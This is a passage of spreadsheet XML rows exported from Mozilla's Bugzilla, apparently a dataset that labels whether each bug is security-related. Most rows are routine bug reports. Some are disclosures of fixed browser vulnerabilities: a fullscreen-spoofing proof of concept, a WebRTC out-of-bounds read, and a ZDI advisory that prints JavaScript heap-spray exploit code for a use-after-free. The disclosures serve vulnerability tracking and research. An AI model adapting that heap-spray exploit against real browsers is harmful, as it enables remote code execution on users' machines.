      </c>
      <c r="B1335" t="inlineStr">
        <is>
          <t>2023-02-11 23:45:51 -0800</t>
        </is>
      </c>
      <c r="C1335" t="inlineStr">
        <is>
          <t>Obscuring the Full-Screen notification in Firefox Using maximized external application window (e.g. via mailto:)</t>
        </is>
      </c>
      <c r="D1335" t="inlineStr">
        <is>
          <t>2024-05-30 11:05:19 -0700</t>
        </is>
      </c>
      <c r="E1335" t="n">
        <v>1</v>
      </c>
      <c r="F1335" t="n">
        <v>1</v>
      </c>
      <c r="G1335" t="n">
        <v>3</v>
      </c>
      <c r="H1335" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1335" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1335" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1335" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1335" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1335" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1335" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1335" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1335" t="inlineStr">
        <is>
          <t>reporter argues for sec-high [reporter-external] [client-bounty-form] [verif?][adv-main115+][adv-esr102.13+]</t>
        </is>
      </c>
      <c r="Q1335" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1335" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1335" t="inlineStr">
        <is>
          <t>115 Branch</t>
        </is>
      </c>
      <c r="T1335" t="n">
        <v>1</v>
      </c>
      <c r="U1335" t="n">
        <v>0</v>
      </c>
      <c r="V1335" t="n">
        <v>36</v>
      </c>
      <c r="W1335" t="inlineStr">
        <is>
          <t>Created attachment 9317220
poc.rar
In Firefox, an Attacker Can Conceal Fullscreen Notification.
When the victim clicks the button, the following proof-of-concept (POC) triggers the launch of User default mail application using the MailTo URI and Fullscreen simultaneously. This obscures the full-screen notification and loads a spoofed page in the background.
I have also tested the proof of concept on Chromium. The notification is displayed above the mail application, indicating to the user that it is in full-screen mode. 
Steps to Reproduce:
1. Download and extract the file poc.rar to a folder
2. Open poc.html in a Firefox browser to Begin testing.
Video Demonstration: https://youtu.be/zlM3iqqzxzo (YouTube Unlisted)</t>
        </is>
      </c>
      <c r="X1335" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" t="n">
        <v>1217663</v>
      </c>
      <c r="B1336" t="inlineStr">
        <is>
          <t>2015-10-22 17:30:40 -0700</t>
        </is>
      </c>
      <c r="C1336" t="inlineStr">
        <is>
          <t>Missing status check in I420VideoFrame::CreateFrame creates memory-safety bug</t>
        </is>
      </c>
      <c r="D1336" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:31 -0700</t>
        </is>
      </c>
      <c r="E1336" t="n">
        <v>1</v>
      </c>
      <c r="F1336" t="n">
        <v>1</v>
      </c>
      <c r="G1336" t="n">
        <v>3</v>
      </c>
      <c r="H1336" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1336" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1336" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K1336" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1336" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1336" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1336" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1336" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1336" t="inlineStr">
        <is>
          <t>[adv-main45+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1336" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1336" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1336" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1336" t="n">
        <v>1</v>
      </c>
      <c r="U1336" t="n">
        <v>0</v>
      </c>
      <c r="V1336" t="n">
        <v>11</v>
      </c>
      <c r="W1336" t="inlineStr">
        <is>
          <t>I420VideoFrame::CreateFrame (media\webrtc\trunk\webrtc\common_video\i420_video_frame.cc) doesn't check (or propagate) the return code from its calls to Plane::Copy. In consequence, if Plane::Copy fails due to OOM (which could be intermittent), CreateFrame still sets its |width_| and |height_| members. If the new height and/or width are larger than the old one(s), this causes other code (such as ViEExternalRendererImpl::RenderFrame) to use the larger height and/or width when reading the frame's plane buffers, which causes that code to read memory to which it has no right.
The bug is still present in today's trunk: http://hg.mozilla.org/mozilla-central/file/5a6ef7c09c12/media/webrtc/trunk/webrtc/common_video/i420_video_frame.cc .
Details
-------
The bug is in lines 57-9: 
48: int I420VideoFrame::CreateFrame(int size_y, const uint8_t* buffer_y,
49:                                 int size_u, const uint8_t* buffer_u,
50:                                 int size_v, const uint8_t* buffer_v,
51:                                 int width, int height,
52:                                 int stride_y, int stride_u, int stride_v) {
53:   if (size_y &lt; 1 || size_u &lt; 1 || size_v &lt; 1)
54:     return -1;
55:   if (CheckDimensions(width, height, stride_y, stride_u, stride_v) &lt; 0)
56:     return -1;
57:   y_plane_.Copy(size_y, stride_y, buffer_y);
58:   u_plane_.Copy(size_u, stride_u, buffer_u);
59:   v_plane_.Copy(size_v, stride_v, buffer_v);
60:   width_ = width;
61:   height_ = height;
62:   return 0;
63: }
The definition of Plane::Copy (from media\webrtc\trunk\webrtc\common_video\plane.cc) is thus:
69: int Plane::Copy(int size, int stride, const uint8_t* buffer) {
70:   if (MaybeResize(size) &lt; 0)
71:     return -1;
72:   memcpy(buffer_.get(), buffer, size);
73:   plane_size_ = size;
74:   stride_ = stride;
75:   return 0;
76: }
The bug can be simulated in the debugger as follows:
   1.  Start FF with one window, one tab;
   2.  Start FF Hello and create a conversation;
   3.  Undock the Hello window from the main window;
   4.  Copy the conversation link into the address bar and join the conversation;
   5.  Share tabs in the Hello window after it's connected;
   6.  Attach a debugger to FF;
   7.  Set a breakpoint on I420VideoFrame::CreateFrame at the call to |y_plane_.Copy| with the condition |height != height_|.
   8.  Rapidly increase the vertical size of the main window;
   9.  When the breakpoint fires:
       a. record the values of |height| and |height_|; and
       b. step into each call to |plane::Copy| and simulate an OOM by skipping the call to |MaybeResize| and instead giving control to |return -1;|
   10. Notice how I420VideoFrame::CreateFrame unconditionally sets |height_ = height|.
   11. Set a breakpoint on ViEExternalRendererImpl::RenderFrame (media\webrtc\trunk\webrtc\video_engine\vie_renderer.cc), where it calls ExtractBuffer.
   12. Let execution proceed.
   13. When the breakpoint fires, step into ExtractBuffer (module webrtc_libyuv.cc) and examine |input_frame.height|. It should be the same as the new value you saw at the breakpoint in I420VideoFrame::CreateFrame;
   14. Now compute |input_frame.y_plane.allocated_size_ / input_frame.y_plane.stride_| and notice that it equals the old, smaller value of |height_| instead of |input_frame.height|.
   15. Notice how ExtractBuffer uses |input_frame.height()| (== |input_frame.height|) to compute the bounds for its inner |for| loop;
   16. If you're using WinDBG (but not VS, alas) set a read breakpoint on the byte just beyond the buffer's end, let execution proceed, and watch it fire (or, if you increased the size of the window a lot, watch it read access-violate).</t>
        </is>
      </c>
      <c r="X1336" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" t="n">
        <v>139522</v>
      </c>
      <c r="B1337" t="inlineStr">
        <is>
          <t>2002-04-23 10:55:15 -0700</t>
        </is>
      </c>
      <c r="C1337" t="inlineStr">
        <is>
          <t>SSL Pages are incorrectly displayed as being not encrypted</t>
        </is>
      </c>
      <c r="D1337" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E1337" t="n">
        <v>1</v>
      </c>
      <c r="F1337" t="n">
        <v>1</v>
      </c>
      <c r="G1337" t="n">
        <v>6</v>
      </c>
      <c r="H1337" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1337" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1337" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K1337" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L1337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1337" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1337" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1337" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1337" t="inlineStr">
        <is>
          <t>[adt1] [m5+]</t>
        </is>
      </c>
      <c r="Q1337" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1337" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1337" t="inlineStr">
        <is>
          <t>psm2.3</t>
        </is>
      </c>
      <c r="T1337" t="n">
        <v>1</v>
      </c>
      <c r="U1337" t="n">
        <v>0</v>
      </c>
      <c r="V1337" t="n">
        <v>26</v>
      </c>
      <c r="W1337" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0rc1) Gecko/20020417
BuildID:    2002041711
Same Problem as in Bug #139487, just in Win98.
The Problem occurs only if I launched Mozilla via Mozilla Mail, check my Mail
(starting PSM due to encrypted PWDs) and THEN open an SSL page.
Because this SSL page is a Homebanking-Site I would classify this bug as
CRITICAL (or worse)
Reproducible: Always
Steps to Reproduce:
1. exit Mozilla (if open)
2. Launch Mozilla Mail (using RC1 build)
3. Check Mail (have to enter password for PSM)
4. open Navigator
5. open URL "http://www.postbank-banking.de" (in German, but one should at least
see that ist's not encrypted as it is supposed to be)
Actual Results:  The browser switches to https:// ... but the site is NOT
encrypted like it is supposed to be.
Expected Results:  encrypt the page like it does when I launch Mozilla via
Navigator.</t>
        </is>
      </c>
      <c r="X1337" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" t="n">
        <v>630919</v>
      </c>
      <c r="B1338" t="inlineStr">
        <is>
          <t>2011-02-02 10:29:19 -0800</t>
        </is>
      </c>
      <c r="C1338" t="inlineStr">
        <is>
          <t>nsTreeRange Dangling Pointer Remote Code Execution Vulnerability (ZDI-CAN-1084)</t>
        </is>
      </c>
      <c r="D1338" t="inlineStr">
        <is>
          <t>2011-05-09 13:26:47 -0700</t>
        </is>
      </c>
      <c r="E1338" t="n">
        <v>1</v>
      </c>
      <c r="F1338" t="n">
        <v>1</v>
      </c>
      <c r="G1338" t="n">
        <v>3</v>
      </c>
      <c r="H1338" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1338" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1338" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K1338" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1338" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1338" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1338" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1338" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q1338" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1338" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1338" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1338" t="n">
        <v>1</v>
      </c>
      <c r="U1338" t="n">
        <v>0</v>
      </c>
      <c r="V1338" t="n">
        <v>23</v>
      </c>
      <c r="W1338" t="inlineStr">
        <is>
          <t>ZDI-CAN-1084: Mozilla Firefox nsTreeRange Dangling Pointer Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following 
products:
    Mozilla Firefo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way Firefox handles user defined
functions of a nsTreeSelection element. When executing the function
invalidateSelection it is possible to free the nsTreeSelection object
that the function operates on. Any further operations on the freed
object can result in remote code execution.
Version(s)  tested: Firefox 3.6.13
Platform(s) tested: Windows XP SP3
---------------------
Vulnerability details
---------------------
View of XUL &lt;tree&gt; element exposes "selection" attribute. This in turn
allows user to setup custom tree box object. One of |nsTreeSelection|
methods is invalidateSelection(). From
layout/xul/base/src/tree/src/nsTreeSelection.cpp:
nsTreeSelection::InvalidateSelection()
{
  if (mFirstRange)
    mFirstRange-&gt;Invalidate();
  return NS_OK;
}
|mFirstRange| is defined as pointer to |nsTreeRange| struct.
struct nsTreeRange
{
  ...
  void Invalidate() {
    if (mSelection-&gt;mTree)
      mSelection-&gt;mTree-&gt;InvalidateRange(mMin, mMax);
    if (mNext)
      mNext-&gt;Invalidate();
  }
  ...
}
If execution of our custom made method invalidateRange() causes
destruction of all ranges withing selection (including |nsTreeRange|
instance which code is being executed at the moment), |this| in the
context of |Invalidate()| will be referring to already freed memory. In
other words: value of |mNext| is under attackers' control.
  sel.tree = {
    invalidateRange: function(s,e) {
      sel.tree = null;
      sel.clearSelection();
      var container = new Array();
      var addr = unescape("%u0a0a%u0a0a");
      var shellcode = unescape("%u9090%u9090"); // +
      var big = addr;
        while (big.length &lt; 0x100000)
      big += big;
      var len = big.length - shellcode.length - 1;
      for (i = 0; i &lt; 150; ++i)
        container.push(big.substring(0, len) + shellcode);
      var block = addr;
      while (block.length &lt; 8)
        block += block;
      for (var i = 0; i &lt; 1024*8; ++i)
         container.push(block + addr);
    }
  }
This will remove the tree and replace the object with 0x0a0a0a0a. Its
not 100% reliable, but it is a working exploit up to the DEP evasion.
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X1338" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" t="n">
        <v>882084</v>
      </c>
      <c r="B1339" t="inlineStr">
        <is>
          <t>2013-06-12 03:29:20 -0700</t>
        </is>
      </c>
      <c r="C1339" t="inlineStr">
        <is>
          <t>[Cost Control] Info about SMSs sent is not updated correctly</t>
        </is>
      </c>
      <c r="D1339" t="inlineStr">
        <is>
          <t>2013-07-17 12:10:45 -0700</t>
        </is>
      </c>
      <c r="E1339" t="n">
        <v>1</v>
      </c>
      <c r="F1339" t="n">
        <v>1</v>
      </c>
      <c r="G1339" t="n">
        <v>6</v>
      </c>
      <c r="H1339" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1339" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1339" t="inlineStr">
        <is>
          <t>Gaia::Cost Control</t>
        </is>
      </c>
      <c r="K1339" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1339" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1339" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1339" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1339" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1339" t="inlineStr">
        <is>
          <t>leorun3,leorun4</t>
        </is>
      </c>
      <c r="Q1339" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1339" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1339" t="inlineStr">
        <is>
          <t>1.1 QE4 (15jul)</t>
        </is>
      </c>
      <c r="T1339" t="n">
        <v>1</v>
      </c>
      <c r="U1339" t="n">
        <v>0</v>
      </c>
      <c r="V1339" t="n">
        <v>28</v>
      </c>
      <c r="W1339" t="inlineStr">
        <is>
          <t>leo device with test run3 build.
Test case ID: #5468
PROCEDURE
Use a post-paid VIVO Sim card.
1. Open Usage app and press home to leave it in background
2. Open Messaging app, create and send an SMS
3. Open Usage app again, on Phone check the SMS counter
EXPECTED
The counter is refreshed and shows the number of SMSs sent
ACTUAL
The counter is only refreshed when Usage app is closed at the moment when the SMS is sent.
If Usage app is open, then the counter does not work properly. The number of SMSs is not updated</t>
        </is>
      </c>
      <c r="X1339" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" t="n">
        <v>667869</v>
      </c>
      <c r="B1340" t="inlineStr">
        <is>
          <t>2011-06-28 04:18:10 -0700</t>
        </is>
      </c>
      <c r="C1340" t="inlineStr">
        <is>
          <t>UTest Bug ID: 180368 - Post to Facebook doesn't work</t>
        </is>
      </c>
      <c r="D1340" t="inlineStr">
        <is>
          <t>2011-07-08 11:05:47 -0700</t>
        </is>
      </c>
      <c r="E1340" t="n">
        <v>1</v>
      </c>
      <c r="F1340" t="n">
        <v>1</v>
      </c>
      <c r="G1340" t="n">
        <v>5</v>
      </c>
      <c r="H1340" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1340" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J1340" t="inlineStr">
        <is>
          <t>webifyme.org</t>
        </is>
      </c>
      <c r="K1340" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1340" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1340" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N1340" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1340" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1340" t="inlineStr"/>
      <c r="Q1340" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1340" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1340" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1340" t="n">
        <v>1</v>
      </c>
      <c r="U1340" t="n">
        <v>0</v>
      </c>
      <c r="V1340" t="n">
        <v>3</v>
      </c>
      <c r="W1340" t="inlineStr">
        <is>
          <t>Created attachment 542418
CannotposttoFB.avi
Platform: PC
OS: Windows 7 Ultimate 64
Location: Poland
Browser: Safari
1. Create your collage (address of mine collage: https://webifyme-dev.allizom.org/en-US/collage/bd6823e90c20/)
2. Click post to Facebook
Expected Result: Collage should be posted on Facebook
Actual Result: There is error message. Message translated from Polish to English:
You can't post on this wall.
I'm trying to post on my own wall, so it's not Facebook access issues.</t>
        </is>
      </c>
      <c r="X1340" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" t="n">
        <v>1032744</v>
      </c>
      <c r="B1341" t="inlineStr">
        <is>
          <t>2014-07-01 03:02:42 -0700</t>
        </is>
      </c>
      <c r="C1341" t="inlineStr">
        <is>
          <t>provide architecture and run documentation for production proxxy server in mana</t>
        </is>
      </c>
      <c r="D1341" t="inlineStr">
        <is>
          <t>2015-07-22 06:57:50 -0700</t>
        </is>
      </c>
      <c r="E1341" t="n">
        <v>1</v>
      </c>
      <c r="F1341" t="n">
        <v>1</v>
      </c>
      <c r="G1341" t="n">
        <v>5</v>
      </c>
      <c r="H1341" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1341" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J1341" t="inlineStr">
        <is>
          <t>RelOps: General</t>
        </is>
      </c>
      <c r="K1341" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1341" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1341" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1341" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1341" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1341" t="inlineStr">
        <is>
          <t xml:space="preserve">[kanban:engops:https://mozilla.kanbanize.com/ctrl_board/6/711] </t>
        </is>
      </c>
      <c r="Q1341" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1341" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1341" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1341" t="n">
        <v>1</v>
      </c>
      <c r="U1341" t="n">
        <v>0</v>
      </c>
      <c r="V1341" t="n">
        <v>5</v>
      </c>
      <c r="W1341" t="inlineStr">
        <is>
          <t>Please provide architectural and run documentation for sccache on mana so that we know how the system is build, what dependencies it has, how critical the service is, who should be notified in case of issues, etc. Documentation should be linked from https://mana.mozilla.org/wiki/display/IT/Releng and use either the websites template or follow the format of existing non-website documentation such as https://mana.mozilla.org/wiki/display/IT/Buildbot</t>
        </is>
      </c>
      <c r="X1341" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" t="n">
        <v>3440</v>
      </c>
      <c r="B1342" t="inlineStr">
        <is>
          <t>1999-03-05 01:16:59 -0800</t>
        </is>
      </c>
      <c r="C1342" t="inlineStr">
        <is>
          <t>[TreeBuilder] Can't re-open a folder that contains XUL content</t>
        </is>
      </c>
      <c r="D1342" t="inlineStr">
        <is>
          <t>2018-08-03 07:06:55 -0700</t>
        </is>
      </c>
      <c r="E1342" t="n">
        <v>1</v>
      </c>
      <c r="F1342" t="n">
        <v>1</v>
      </c>
      <c r="G1342" t="n">
        <v>6</v>
      </c>
      <c r="H1342" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1342" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1342" t="inlineStr">
        <is>
          <t>RDF</t>
        </is>
      </c>
      <c r="K1342" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1342" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1342" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N1342" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1342" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1342" t="inlineStr">
        <is>
          <t>this will unblock several- need status</t>
        </is>
      </c>
      <c r="Q1342" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1342" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1342" t="inlineStr">
        <is>
          <t>M7</t>
        </is>
      </c>
      <c r="T1342" t="n">
        <v>1</v>
      </c>
      <c r="U1342" t="n">
        <v>0</v>
      </c>
      <c r="V1342" t="n">
        <v>17</v>
      </c>
      <c r="W1342" t="inlineStr">
        <is>
          <t>This happens because the TreeBuilder is destroying the XUL content. There are a
couple of things we need to do.
1) Only destroy tree content that the TreeBuilder has built.
2) Only destroy tree content when some threshold is exceeded (e.g., the folder
contains &gt;100 elements).
3) Add style rules so that a closed folder's frames are marked as |display:
hidden|</t>
        </is>
      </c>
      <c r="X1342" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" t="n">
        <v>1270398</v>
      </c>
      <c r="B1343" t="inlineStr">
        <is>
          <t>2016-05-05 00:40:57 -0700</t>
        </is>
      </c>
      <c r="C1343" t="inlineStr">
        <is>
          <t>[TV][Home] Navigation from a card in folder to filter and folder still be expanded</t>
        </is>
      </c>
      <c r="D1343" t="inlineStr">
        <is>
          <t>2016-05-17 20:03:17 -0700</t>
        </is>
      </c>
      <c r="E1343" t="n">
        <v>1</v>
      </c>
      <c r="F1343" t="n">
        <v>1</v>
      </c>
      <c r="G1343" t="n">
        <v>6</v>
      </c>
      <c r="H1343" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1343" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1343" t="inlineStr">
        <is>
          <t>Gaia::TV::Home</t>
        </is>
      </c>
      <c r="K1343" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1343" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1343" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1343" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1343" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1343" t="inlineStr">
        <is>
          <t>[ft:conndevices]</t>
        </is>
      </c>
      <c r="Q1343" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1343" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1343" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1343" t="n">
        <v>1</v>
      </c>
      <c r="U1343" t="n">
        <v>0</v>
      </c>
      <c r="V1343" t="n">
        <v>5</v>
      </c>
      <c r="W1343" t="inlineStr">
        <is>
          <t>[Description]
According to the latest UX spec(https://drive.google.com/open?id=0BwbmH5cX2W6Od0EwMXpSWlFwcDQ), if user navigates from a card in folder to filter, the folder should be faded out
[Testing Steps]
1. Add a new folder with any card
2. Navigation to a card in step 1's folder
3. Navigation to filter
[Expected result]
Folder should be faded out
[Actual result]
Folder still be expanded
[Build Info]
Environment: 2.6 Simulator
gaia:
https://github.com/mozilla-b2g/gaia/commit/4698bb1d24fac0db76f1f16f144cf0dae4bc3c23
gecko:
https://github.com/mozilla-b2g/gecko-b2g/commit/ccf59a9dda868db58b5d943e2c4235ead89f9344</t>
        </is>
      </c>
      <c r="X1343" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" t="n">
        <v>1595604</v>
      </c>
      <c r="B1344" t="inlineStr">
        <is>
          <t>2019-11-11 12:25:59 -0800</t>
        </is>
      </c>
      <c r="C1344" t="inlineStr">
        <is>
          <t>[Experiment] Add-On Experiment: Fingerprinting Implementation Retention Study V1 Fx 69.0 to 71.0 Release</t>
        </is>
      </c>
      <c r="D1344" t="inlineStr">
        <is>
          <t>2020-01-14 09:35:04 -0800</t>
        </is>
      </c>
      <c r="E1344" t="n">
        <v>1</v>
      </c>
      <c r="F1344" t="n">
        <v>1</v>
      </c>
      <c r="G1344" t="n">
        <v>5</v>
      </c>
      <c r="H1344" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1344" t="inlineStr">
        <is>
          <t>Shield</t>
        </is>
      </c>
      <c r="J1344" t="inlineStr">
        <is>
          <t>Shield Study</t>
        </is>
      </c>
      <c r="K1344" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1344" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1344" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1344" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1344" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1344" t="inlineStr"/>
      <c r="Q1344" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1344" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1344" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1344" t="n">
        <v>1</v>
      </c>
      <c r="U1344" t="n">
        <v>0</v>
      </c>
      <c r="V1344" t="n">
        <v>52</v>
      </c>
      <c r="W1344" t="inlineStr">
        <is>
          <t>Fingerprinting Implementation Retention Study V1
We plan to study the effect of different implementations (domain - current, vs url and function) of fingerprinting blocking. Following a reduction in retention observed in Fingerprinting Protections Retention Study v1, this study will see if more fine grained blocking of fingerprinters affects retention. CUT second sentence and make diff implementations clear.
Experimenter is the source of truth for details and delivery. Changes to Bugzilla are not reflected in Experimenter and will not change delivery configuration.
More information: https://experimenter.services.mozilla.com/experiments/fingerprinting-implementation-retention-study-v1/</t>
        </is>
      </c>
      <c r="X1344" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" t="n">
        <v>1457986</v>
      </c>
      <c r="B1345" t="inlineStr">
        <is>
          <t>2018-04-30 11:23:29 -0700</t>
        </is>
      </c>
      <c r="C1345" t="inlineStr">
        <is>
          <t>update AuroraVersionFixitRule info for 61.0b1</t>
        </is>
      </c>
      <c r="D1345" t="inlineStr">
        <is>
          <t>2018-06-20 18:17:36 -0700</t>
        </is>
      </c>
      <c r="E1345" t="n">
        <v>1</v>
      </c>
      <c r="F1345" t="n">
        <v>1</v>
      </c>
      <c r="G1345" t="n">
        <v>4</v>
      </c>
      <c r="H1345" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1345" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1345" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
